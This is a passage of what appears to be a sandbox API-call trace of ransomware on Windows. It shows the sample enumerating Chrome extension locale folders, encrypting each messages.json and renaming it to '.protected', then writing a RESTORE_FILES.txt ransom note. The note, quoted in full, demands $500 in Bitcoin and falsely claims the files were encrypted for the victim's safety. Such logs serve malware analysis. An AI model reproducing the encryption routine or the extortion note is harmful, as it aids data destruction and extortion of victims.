(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.610] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.610] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.610] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.610] CloseHandle (hObject=0x164) returned 1 [0079.610] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.610] lstrcmpiW (lpString1="tr", lpString2="Windows") returned -1 [0079.610] lstrcmpiW (lpString1="tr", lpString2="Program Files") returned 1 [0079.610] lstrcmpiW (lpString1="tr", lpString2="Program Files (x86)") returned 1 [0079.610] lstrcmpiW (lpString1="tr", lpString2="$Recycle.bin") returned 1 [0079.610] lstrcmpiW (lpString1="tr", lpString2="System Volume Information") returned 1 [0079.610] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr") returned 142 [0079.610] lstrcmpW (lpString1="tr", lpString2=".") returned 1 [0079.610] lstrcmpW (lpString1="tr", lpString2="..") returned 1 [0079.610] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\*") returned 144 [0079.610] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.610] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.610] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.610] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.610] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.610] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.610] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\.") returned 144 [0079.610] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.610] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.610] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.610] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.611] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.611] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.611] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.611] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\..") returned 145 [0079.611] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.611] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.611] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.611] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.611] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.611] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.611] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.611] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.611] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json") returned 156 [0079.611] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.611] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.611] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.611] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.611] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json") returned 156 [0079.611] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.611] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json") returned 156 [0079.611] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.611] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json") returned 156 [0079.611] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.611] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x10e, lpOverlapped=0x0) returned 1 [0079.612] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.612] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x10e, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x10e, lpOverlapped=0x0) returned 1 [0079.613] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.613] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.613] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.613] CloseHandle (hObject=0x168) returned 1 [0079.613] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.protected") returned 166 [0079.613] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.protected")) returned 1 [0079.616] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.616] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.616] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\RESTORE_FILES.txt") returned 160 [0079.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.617] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.617] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.617] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.617] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.617] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.617] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.617] CloseHandle (hObject=0x164) returned 1 [0079.618] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.618] lstrcmpiW (lpString1="uk", lpString2="Windows") returned -1 [0079.618] lstrcmpiW (lpString1="uk", lpString2="Program Files") returned 1 [0079.618] lstrcmpiW (lpString1="uk", lpString2="Program Files (x86)") returned 1 [0079.618] lstrcmpiW (lpString1="uk", lpString2="$Recycle.bin") returned 1 [0079.618] lstrcmpiW (lpString1="uk", lpString2="System Volume Information") returned 1 [0079.618] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk") returned 142 [0079.618] lstrcmpW (lpString1="uk", lpString2=".") returned 1 [0079.618] lstrcmpW (lpString1="uk", lpString2="..") returned 1 [0079.618] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\*") returned 144 [0079.618] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.618] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.618] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.618] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.618] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.618] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.618] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\.") returned 144 [0079.618] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.618] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.618] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.618] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.618] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.618] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.618] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.618] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\..") returned 145 [0079.618] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.618] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.618] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.618] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.618] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.618] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.618] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.618] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.618] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json") returned 156 [0079.618] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.618] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.618] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.619] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.619] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.622] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json") returned 156 [0079.622] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.622] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json") returned 156 [0079.622] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.622] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json") returned 156 [0079.622] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.622] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x161, lpOverlapped=0x0) returned 1 [0079.623] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffe9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.623] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x161, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x161, lpOverlapped=0x0) returned 1 [0079.623] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.623] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.623] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.624] CloseHandle (hObject=0x168) returned 1 [0079.624] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.protected") returned 166 [0079.624] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.protected")) returned 1 [0079.624] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.624] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.624] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\RESTORE_FILES.txt") returned 160 [0079.625] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.625] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.625] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.625] lstrlenA 